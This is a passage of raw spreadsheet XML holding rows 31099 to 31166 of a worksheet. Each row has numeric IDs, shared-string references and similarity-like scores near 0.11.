        <v>2.6692621E7</v>
      </c>
      <c r="C31099" s="2" t="s">
        <v>29906</v>
      </c>
      <c r="D31099" s="2">
        <v>1.0</v>
      </c>
      <c r="E31099" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31099" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31100" ht="15.75" customHeight="1">
      <c r="A31100" s="1">
        <v>28960.0</v>
      </c>
      <c r="B31100" s="2">
        <v>2.9786487E7</v>
      </c>
      <c r="C31100" s="2" t="s">
        <v>29907</v>
      </c>
      <c r="D31100" s="2">
        <v>1.0</v>
      </c>
      <c r="E31100" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31100" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31101" ht="15.75" customHeight="1">
      <c r="A31101" s="1">
        <v>29333.0</v>
      </c>
      <c r="B31101" s="2">
        <v>3.1333074E7</v>
      </c>
      <c r="C31101" s="2" t="s">
        <v>29908</v>
      </c>
      <c r="D31101" s="2">
        <v>1.0</v>
      </c>
      <c r="E31101" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31101" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31102" ht="15.75" customHeight="1">
      <c r="A31102" s="1">
        <v>29462.0</v>
      </c>
      <c r="B31102" s="2">
        <v>3.2314085E7</v>
      </c>
      <c r="C31102" s="2" t="s">
        <v>29909</v>
      </c>
      <c r="D31102" s="2">
        <v>1.0</v>
      </c>
      <c r="E31102" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31102" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31103" ht="15.75" customHeight="1">
      <c r="A31103" s="1">
        <v>29556.0</v>
      </c>
      <c r="B31103" s="2">
        <v>3.3153889E7</v>
      </c>
      <c r="C31103" s="2" t="s">
        <v>29910</v>
      </c>
      <c r="D31103" s="2">
        <v>1.0</v>
      </c>
      <c r="E31103" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31103" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31104" ht="15.75" customHeight="1">
      <c r="A31104" s="1">
        <v>29785.0</v>
      </c>
      <c r="B31104" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C31104" s="2" t="s">
        <v>29911</v>
      </c>
      <c r="D31104" s="2">
        <v>1.0</v>
      </c>
      <c r="E31104" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31104" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31105" ht="15.75" customHeight="1">
      <c r="A31105" s="1">
        <v>30122.0</v>
      </c>
      <c r="B31105" s="2">
        <v>3.6889936E7</v>
      </c>
      <c r="C31105" s="2" t="s">
        <v>29885</v>
      </c>
      <c r="D31105" s="2">
        <v>1.0</v>
      </c>
      <c r="E31105" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31105" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31106" ht="15.75" customHeight="1">
      <c r="A31106" s="1">
        <v>30164.0</v>
      </c>
      <c r="B31106" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C31106" s="2" t="s">
        <v>29912</v>
      </c>
      <c r="D31106" s="2">
        <v>1.0</v>
      </c>
      <c r="E31106" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31106" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31107" ht="15.75" customHeight="1">
      <c r="A31107" s="1">
        <v>30167.0</v>
      </c>
      <c r="B31107" s="2">
        <v>3.707285E7</v>
      </c>
      <c r="C31107" s="2" t="s">
        <v>29886</v>
      </c>
      <c r="D31107" s="2">
        <v>1.0</v>
      </c>
      <c r="E31107" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31107" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31108" ht="15.75" customHeight="1">
      <c r="A31108" s="1">
        <v>30169.0</v>
      </c>
      <c r="B31108" s="2">
        <v>3.7099916E7</v>
      </c>
      <c r="C31108" s="2" t="s">
        <v>29913</v>
      </c>
      <c r="D31108" s="2">
        <v>1.0</v>
      </c>
      <c r="E31108" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31108" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31109" ht="15.75" customHeight="1">
      <c r="A31109" s="1">
        <v>30245.0</v>
      </c>
      <c r="B31109" s="2">
        <v>3754309.0</v>
      </c>
      <c r="C31109" s="2" t="s">
        <v>29914</v>
      </c>
      <c r="D31109" s="2">
        <v>1.0</v>
      </c>
      <c r="E31109" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31109" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31110" ht="15.75" customHeight="1">
      <c r="A31110" s="1">
        <v>30267.0</v>
      </c>
      <c r="B31110" s="2">
        <v>3.765069E7</v>
      </c>
      <c r="C31110" s="2" t="s">
        <v>29915</v>
      </c>
      <c r="D31110" s="2">
        <v>1.0</v>
      </c>
      <c r="E31110" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31110" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31111" ht="15.75" customHeight="1">
      <c r="A31111" s="1">
        <v>30307.0</v>
      </c>
      <c r="B31111" s="2">
        <v>3.7941894E7</v>
      </c>
      <c r="C31111" s="2" t="s">
        <v>29916</v>
      </c>
      <c r="D31111" s="2">
        <v>1.0</v>
      </c>
      <c r="E31111" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31111" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31112" ht="15.75" customHeight="1">
      <c r="A31112" s="1">
        <v>30486.0</v>
      </c>
      <c r="B31112" s="2">
        <v>3.9877394E7</v>
      </c>
      <c r="C31112" s="2" t="s">
        <v>29917</v>
      </c>
      <c r="D31112" s="2">
        <v>1.0</v>
      </c>
      <c r="E31112" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31112" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31113" ht="15.75" customHeight="1">
      <c r="A31113" s="1">
        <v>30533.0</v>
      </c>
      <c r="B31113" s="2">
        <v>4.0489109E7</v>
      </c>
      <c r="C31113" s="2" t="s">
        <v>29918</v>
      </c>
      <c r="D31113" s="2">
        <v>1.0</v>
      </c>
      <c r="E31113" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31113" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31114" ht="15.75" customHeight="1">
      <c r="A31114" s="1">
        <v>30540.0</v>
      </c>
      <c r="B31114" s="2">
        <v>4.0569463E7</v>
      </c>
      <c r="C31114" s="2" t="s">
        <v>29919</v>
      </c>
      <c r="D31114" s="2">
        <v>1.0</v>
      </c>
      <c r="E31114" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31114" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31115" ht="15.75" customHeight="1">
      <c r="A31115" s="1">
        <v>31791.0</v>
      </c>
      <c r="B31115" s="2">
        <v>5235658.0</v>
      </c>
      <c r="C31115" s="2" t="s">
        <v>29920</v>
      </c>
      <c r="D31115" s="2">
        <v>1.0</v>
      </c>
      <c r="E31115" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31115" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31116" ht="15.75" customHeight="1">
      <c r="A31116" s="1">
        <v>32827.0</v>
      </c>
      <c r="B31116" s="2">
        <v>6232202.0</v>
      </c>
      <c r="C31116" s="2" t="s">
        <v>29921</v>
      </c>
      <c r="D31116" s="2">
        <v>1.0</v>
      </c>
      <c r="E31116" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31116" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31117" ht="15.75" customHeight="1">
      <c r="A31117" s="1">
        <v>32902.0</v>
      </c>
      <c r="B31117" s="2">
        <v>6395523.0</v>
      </c>
      <c r="C31117" s="2" t="s">
        <v>29922</v>
      </c>
      <c r="D31117" s="2">
        <v>1.0</v>
      </c>
      <c r="E31117" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31117" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31118" ht="15.75" customHeight="1">
      <c r="A31118" s="1">
        <v>33018.0</v>
      </c>
      <c r="B31118" s="2">
        <v>6665179.0</v>
      </c>
      <c r="C31118" s="2" t="s">
        <v>29923</v>
      </c>
      <c r="D31118" s="2">
        <v>1.0</v>
      </c>
      <c r="E31118" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31118" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31119" ht="15.75" customHeight="1">
      <c r="A31119" s="1">
        <v>33326.0</v>
      </c>
      <c r="B31119" s="2">
        <v>7559503.0</v>
      </c>
      <c r="C31119" s="2" t="s">
        <v>29924</v>
      </c>
      <c r="D31119" s="2">
        <v>1.0</v>
      </c>
      <c r="E31119" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31119" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31120" ht="15.75" customHeight="1">
      <c r="A31120" s="1">
        <v>33333.0</v>
      </c>
      <c r="B31120" s="2">
        <v>7585497.0</v>
      </c>
      <c r="C31120" s="2" t="s">
        <v>29889</v>
      </c>
      <c r="D31120" s="2">
        <v>1.0</v>
      </c>
      <c r="E31120" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31120" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31121" ht="15.75" customHeight="1">
      <c r="A31121" s="1">
        <v>34225.0</v>
      </c>
      <c r="B31121" s="2">
        <v>4.5154269E7</v>
      </c>
      <c r="C31121" s="2" t="s">
        <v>29925</v>
      </c>
      <c r="D31121" s="2">
        <v>1.0</v>
      </c>
      <c r="E31121" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31121" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31122" ht="15.75" customHeight="1">
      <c r="A31122" s="1">
        <v>1167.0</v>
      </c>
      <c r="B31122" s="2">
        <v>2.4579934E7</v>
      </c>
      <c r="C31122" s="2" t="s">
        <v>29926</v>
      </c>
      <c r="D31122" s="2">
        <v>1.0</v>
      </c>
      <c r="E31122" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31122" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31123" ht="15.75" customHeight="1">
      <c r="A31123" s="1">
        <v>5609.0</v>
      </c>
      <c r="B31123" s="2">
        <v>4.614432E7</v>
      </c>
      <c r="C31123" s="2" t="s">
        <v>29927</v>
      </c>
      <c r="D31123" s="2">
        <v>1.0</v>
      </c>
      <c r="E31123" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31123" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31124" ht="15.75" customHeight="1">
      <c r="A31124" s="1">
        <v>9105.0</v>
      </c>
      <c r="B31124" s="2">
        <v>5.5167792E7</v>
      </c>
      <c r="C31124" s="2" t="s">
        <v>29928</v>
      </c>
      <c r="D31124" s="2">
        <v>1.0</v>
      </c>
      <c r="E31124" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31124" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31125" ht="15.75" customHeight="1">
      <c r="A31125" s="1">
        <v>11315.0</v>
      </c>
      <c r="B31125" s="2">
        <v>2.1049194E7</v>
      </c>
      <c r="C31125" s="2" t="s">
        <v>29929</v>
      </c>
      <c r="D31125" s="2">
        <v>1.0</v>
      </c>
      <c r="E31125" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31125" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31126" ht="15.75" customHeight="1">
      <c r="A31126" s="1">
        <v>11714.0</v>
      </c>
      <c r="B31126" s="2">
        <v>2.3686241E7</v>
      </c>
      <c r="C31126" s="2" t="s">
        <v>29930</v>
      </c>
      <c r="D31126" s="2">
        <v>1.0</v>
      </c>
      <c r="E31126" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31126" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31127" ht="15.75" customHeight="1">
      <c r="A31127" s="1">
        <v>15373.0</v>
      </c>
      <c r="B31127" s="2">
        <v>4.2738977E7</v>
      </c>
      <c r="C31127" s="2" t="s">
        <v>29931</v>
      </c>
      <c r="D31127" s="2">
        <v>1.0</v>
      </c>
      <c r="E31127" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31127" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31128" ht="15.75" customHeight="1">
      <c r="A31128" s="1">
        <v>15448.0</v>
      </c>
      <c r="B31128" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C31128" s="2" t="s">
        <v>29932</v>
      </c>
      <c r="D31128" s="2">
        <v>1.0</v>
      </c>
      <c r="E31128" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31128" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31129" ht="15.75" customHeight="1">
      <c r="A31129" s="1">
        <v>16730.0</v>
      </c>
      <c r="B31129" s="2">
        <v>4.750367E7</v>
      </c>
      <c r="C31129" s="2" t="s">
        <v>29933</v>
      </c>
      <c r="D31129" s="2">
        <v>1.0</v>
      </c>
      <c r="E31129" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31129" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31130" ht="15.75" customHeight="1">
      <c r="A31130" s="1">
        <v>19548.0</v>
      </c>
      <c r="B31130" s="2">
        <v>5.6050558E7</v>
      </c>
      <c r="C31130" s="2" t="s">
        <v>29934</v>
      </c>
      <c r="D31130" s="2">
        <v>1.0</v>
      </c>
      <c r="E31130" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31130" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31131" ht="15.75" customHeight="1">
      <c r="A31131" s="1">
        <v>32618.0</v>
      </c>
      <c r="B31131" s="2">
        <v>5839162.0</v>
      </c>
      <c r="C31131" s="2" t="s">
        <v>29935</v>
      </c>
      <c r="D31131" s="2">
        <v>1.0</v>
      </c>
      <c r="E31131" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31131" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="31132" ht="15.75" customHeight="1">
      <c r="A31132" s="1">
        <v>618.0</v>
      </c>
      <c r="B31132" s="2">
        <v>1.950013E7</v>
      </c>
      <c r="C31132" s="2" t="s">
        <v>29936</v>
      </c>
      <c r="D31132" s="2">
        <v>1.0</v>
      </c>
      <c r="E31132" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31132" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31133" ht="15.75" customHeight="1">
      <c r="A31133" s="1">
        <v>1146.0</v>
      </c>
      <c r="B31133" s="2">
        <v>2.429904E7</v>
      </c>
      <c r="C31133" s="2" t="s">
        <v>29937</v>
      </c>
      <c r="D31133" s="2">
        <v>1.0</v>
      </c>
      <c r="E31133" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31133" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31134" ht="15.75" customHeight="1">
      <c r="A31134" s="1">
        <v>3311.0</v>
      </c>
      <c r="B31134" s="2">
        <v>3.7599106E7</v>
      </c>
      <c r="C31134" s="2" t="s">
        <v>29938</v>
      </c>
      <c r="D31134" s="2">
        <v>1.0</v>
      </c>
      <c r="E31134" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31134" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31135" ht="15.75" customHeight="1">
      <c r="A31135" s="1">
        <v>12697.0</v>
      </c>
      <c r="B31135" s="2">
        <v>3.0765384E7</v>
      </c>
      <c r="C31135" s="2" t="s">
        <v>29939</v>
      </c>
      <c r="D31135" s="2">
        <v>1.0</v>
      </c>
      <c r="E31135" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31135" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31136" ht="15.75" customHeight="1">
      <c r="A31136" s="1">
        <v>14671.0</v>
      </c>
      <c r="B31136" s="2">
        <v>4.045512E7</v>
      </c>
      <c r="C31136" s="2" t="s">
        <v>29940</v>
      </c>
      <c r="D31136" s="2">
        <v>1.0</v>
      </c>
      <c r="E31136" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31136" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31137" ht="15.75" customHeight="1">
      <c r="A31137" s="1">
        <v>15228.0</v>
      </c>
      <c r="B31137" s="2">
        <v>4.2195967E7</v>
      </c>
      <c r="C31137" s="2" t="s">
        <v>29941</v>
      </c>
      <c r="D31137" s="2">
        <v>1.0</v>
      </c>
      <c r="E31137" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31137" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31138" ht="15.75" customHeight="1">
      <c r="A31138" s="1">
        <v>15414.0</v>
      </c>
      <c r="B31138" s="2">
        <v>4.2877002E7</v>
      </c>
      <c r="C31138" s="2" t="s">
        <v>29942</v>
      </c>
      <c r="D31138" s="2">
        <v>1.0</v>
      </c>
      <c r="E31138" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31138" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31139" ht="15.75" customHeight="1">
      <c r="A31139" s="1">
        <v>16347.0</v>
      </c>
      <c r="B31139" s="2">
        <v>4.6087516E7</v>
      </c>
      <c r="C31139" s="2" t="s">
        <v>29943</v>
      </c>
      <c r="D31139" s="2">
        <v>1.0</v>
      </c>
      <c r="E31139" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31139" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31140" ht="15.75" customHeight="1">
      <c r="A31140" s="1">
        <v>21905.0</v>
      </c>
      <c r="B31140" s="2">
        <v>2.8007393E7</v>
      </c>
      <c r="C31140" s="2" t="s">
        <v>29944</v>
      </c>
      <c r="D31140" s="2">
        <v>1.0</v>
      </c>
      <c r="E31140" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31140" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31141" ht="15.75" customHeight="1">
      <c r="A31141" s="1">
        <v>25542.0</v>
      </c>
      <c r="B31141" s="2">
        <v>1.4270182E7</v>
      </c>
      <c r="C31141" s="2" t="s">
        <v>29945</v>
      </c>
      <c r="D31141" s="2">
        <v>1.0</v>
      </c>
      <c r="E31141" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31141" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31142" ht="15.75" customHeight="1">
      <c r="A31142" s="1">
        <v>26737.0</v>
      </c>
      <c r="B31142" s="2">
        <v>1.8284166E7</v>
      </c>
      <c r="C31142" s="2" t="s">
        <v>29946</v>
      </c>
      <c r="D31142" s="2">
        <v>1.0</v>
      </c>
      <c r="E31142" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31142" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31143" ht="15.75" customHeight="1">
      <c r="A31143" s="1">
        <v>29123.0</v>
      </c>
      <c r="B31143" s="2">
        <v>3.0498936E7</v>
      </c>
      <c r="C31143" s="2" t="s">
        <v>29947</v>
      </c>
      <c r="D31143" s="2">
        <v>1.0</v>
      </c>
      <c r="E31143" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31143" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31144" ht="15.75" customHeight="1">
      <c r="A31144" s="1">
        <v>30364.0</v>
      </c>
      <c r="B31144" s="2">
        <v>3.8363018E7</v>
      </c>
      <c r="C31144" s="2" t="s">
        <v>29948</v>
      </c>
      <c r="D31144" s="2">
        <v>1.0</v>
      </c>
      <c r="E31144" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31144" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="31145" ht="15.75" customHeight="1">
      <c r="A31145" s="1">
        <v>10939.0</v>
      </c>
      <c r="B31145" s="2">
        <v>1.700619E7</v>
      </c>
      <c r="C31145" s="2" t="s">
        <v>29949</v>
      </c>
      <c r="D31145" s="2">
        <v>1.0</v>
      </c>
      <c r="E31145" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31145" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="31146" ht="15.75" customHeight="1">
      <c r="A31146" s="1">
        <v>13396.0</v>
      </c>
      <c r="B31146" s="2">
        <v>3497787.0</v>
      </c>
      <c r="C31146" s="2" t="s">
        <v>29950</v>
      </c>
      <c r="D31146" s="2">
        <v>1.0</v>
      </c>
      <c r="E31146" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31146" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="31147" ht="15.75" customHeight="1">
      <c r="A31147" s="1">
        <v>14652.0</v>
      </c>
      <c r="B31147" s="2">
        <v>4.0410035E7</v>
      </c>
      <c r="C31147" s="2" t="s">
        <v>29951</v>
      </c>
      <c r="D31147" s="2">
        <v>1.0</v>
      </c>
      <c r="E31147" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31147" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="31148" ht="15.75" customHeight="1">
      <c r="A31148" s="1">
        <v>24661.0</v>
      </c>
      <c r="B31148" s="2">
        <v>1.152274E7</v>
      </c>
      <c r="C31148" s="2" t="s">
        <v>29952</v>
      </c>
      <c r="D31148" s="2">
        <v>1.0</v>
      </c>
      <c r="E31148" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31148" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="31149" ht="15.75" customHeight="1">
      <c r="A31149" s="1">
        <v>12150.0</v>
      </c>
      <c r="B31149" s="2">
        <v>2.7238844E7</v>
      </c>
      <c r="C31149" s="2" t="s">
        <v>29953</v>
      </c>
      <c r="D31149" s="2">
        <v>1.0</v>
      </c>
      <c r="E31149" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31149" s="2">
        <v>0.1120689655172413</v>
      </c>
    </row>
    <row r="31150" ht="15.75" customHeight="1">
      <c r="A31150" s="1">
        <v>5513.0</v>
      </c>
      <c r="B31150" s="2">
        <v>4.5840978E7</v>
      </c>
      <c r="C31150" s="2" t="s">
        <v>29954</v>
      </c>
      <c r="D31150" s="2">
        <v>1.0</v>
      </c>
      <c r="E31150" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31150" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="31151" ht="15.75" customHeight="1">
      <c r="A31151" s="1">
        <v>10095.0</v>
      </c>
      <c r="B31151" s="2">
        <v>5.7187876E7</v>
      </c>
      <c r="C31151" s="2" t="s">
        <v>29955</v>
      </c>
      <c r="D31151" s="2">
        <v>1.0</v>
      </c>
      <c r="E31151" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31151" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="31152" ht="15.75" customHeight="1">
      <c r="A31152" s="1">
        <v>14805.0</v>
      </c>
      <c r="B31152" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C31152" s="2" t="s">
        <v>29956</v>
      </c>
      <c r="D31152" s="2">
        <v>1.0</v>
      </c>
      <c r="E31152" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31152" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="31153" ht="15.75" customHeight="1">
      <c r="A31153" s="1">
        <v>16119.0</v>
      </c>
      <c r="B31153" s="2">
        <v>4.5447641E7</v>
      </c>
      <c r="C31153" s="2" t="s">
        <v>29957</v>
      </c>
      <c r="D31153" s="2">
        <v>1.0</v>
      </c>
      <c r="E31153" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31153" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="31154" ht="15.75" customHeight="1">
      <c r="A31154" s="1">
        <v>26838.0</v>
      </c>
      <c r="B31154" s="2">
        <v>1.891214E7</v>
      </c>
      <c r="C31154" s="2" t="s">
        <v>29958</v>
      </c>
      <c r="D31154" s="2">
        <v>1.0</v>
      </c>
      <c r="E31154" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31154" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="31155" ht="15.75" customHeight="1">
      <c r="A31155" s="1">
        <v>25255.0</v>
      </c>
      <c r="B31155" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C31155" s="2" t="s">
        <v>29959</v>
      </c>
      <c r="D31155" s="2">
        <v>1.0</v>
      </c>
      <c r="E31155" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31155" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="31156" ht="15.75" customHeight="1">
      <c r="A31156" s="1">
        <v>26273.0</v>
      </c>
      <c r="B31156" s="2">
        <v>1.6399978E7</v>
      </c>
      <c r="C31156" s="2" t="s">
        <v>29960</v>
      </c>
      <c r="D31156" s="2">
        <v>1.0</v>
      </c>
      <c r="E31156" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31156" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="31157" ht="15.75" customHeight="1">
      <c r="A31157" s="1">
        <v>20768.0</v>
      </c>
      <c r="B31157" s="2">
        <v>1.4962654E7</v>
      </c>
      <c r="C31157" s="2" t="s">
        <v>29961</v>
      </c>
      <c r="D31157" s="2">
        <v>1.0</v>
      </c>
      <c r="E31157" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31157" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="31158" ht="15.75" customHeight="1">
      <c r="A31158" s="1">
        <v>1571.0</v>
      </c>
      <c r="B31158" s="2">
        <v>2.7690637E7</v>
      </c>
      <c r="C31158" s="2" t="s">
        <v>29962</v>
      </c>
      <c r="D31158" s="2">
        <v>1.0</v>
      </c>
      <c r="E31158" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31158" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="31159" ht="15.75" customHeight="1">
      <c r="A31159" s="1">
        <v>33271.0</v>
      </c>
      <c r="B31159" s="2">
        <v>7411633.0</v>
      </c>
      <c r="C31159" s="2" t="s">
        <v>29963</v>
      </c>
      <c r="D31159" s="2">
        <v>1.0</v>
      </c>
      <c r="E31159" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31159" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="31160" ht="15.75" customHeight="1">
      <c r="A31160" s="1">
        <v>15029.0</v>
      </c>
      <c r="B31160" s="2">
        <v>4.1553656E7</v>
      </c>
      <c r="C31160" s="2" t="s">
        <v>29964</v>
      </c>
      <c r="D31160" s="2">
        <v>1.0</v>
      </c>
      <c r="E31160" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31160" s="2">
        <v>0.111965811965812</v>
      </c>
    </row>
    <row r="31161" ht="15.75" customHeight="1">
      <c r="A31161" s="1">
        <v>1464.0</v>
      </c>
      <c r="B31161" s="2">
        <v>2.6907588E7</v>
      </c>
      <c r="C31161" s="2" t="s">
        <v>29965</v>
      </c>
      <c r="D31161" s="2">
        <v>1.0</v>
      </c>
      <c r="E31161" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31161" s="2">
        <v>0.1118721461187215</v>
      </c>
    </row>
    <row r="31162" ht="15.75" customHeight="1">
      <c r="A31162" s="1">
        <v>2505.0</v>
      </c>
      <c r="B31162" s="2">
        <v>3.3954256E7</v>
      </c>
      <c r="C31162" s="2" t="s">
        <v>29966</v>
      </c>
      <c r="D31162" s="2">
        <v>1.0</v>
      </c>
      <c r="E31162" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31162" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="31163" ht="15.75" customHeight="1">
      <c r="A31163" s="1">
        <v>28190.0</v>
      </c>
      <c r="B31163" s="2">
        <v>2.5006825E7</v>
      </c>
      <c r="C31163" s="2" t="s">
        <v>29967</v>
      </c>
      <c r="D31163" s="2">
        <v>1.0</v>
      </c>
      <c r="E31163" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31163" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="31164" ht="15.75" customHeight="1">
      <c r="A31164" s="1">
        <v>33159.0</v>
      </c>
      <c r="B31164" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C31164" s="2" t="s">
        <v>29968</v>
      </c>
      <c r="D31164" s="2">
        <v>1.0</v>
      </c>
      <c r="E31164" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31164" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="31165" ht="15.75" customHeight="1">
      <c r="A31165" s="1">
        <v>26907.0</v>
      </c>
      <c r="B31165" s="2">
        <v>1.9327889E7</v>
      </c>
      <c r="C31165" s="2" t="s">
        <v>29969</v>
      </c>
      <c r="D31165" s="2">
        <v>1.0</v>
      </c>
      <c r="E31165" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31165" s="2">
        <v>0.1102430555555556</v>
      </c>
    </row>
    <row r="31166" ht="15.75" customHeight="1">
      <c r="A31166" s="1">
        <v>27217.0</v>
      </c>
      <c r="B31166" s="2">
        <v>2.0971461E7</v>
      </c>
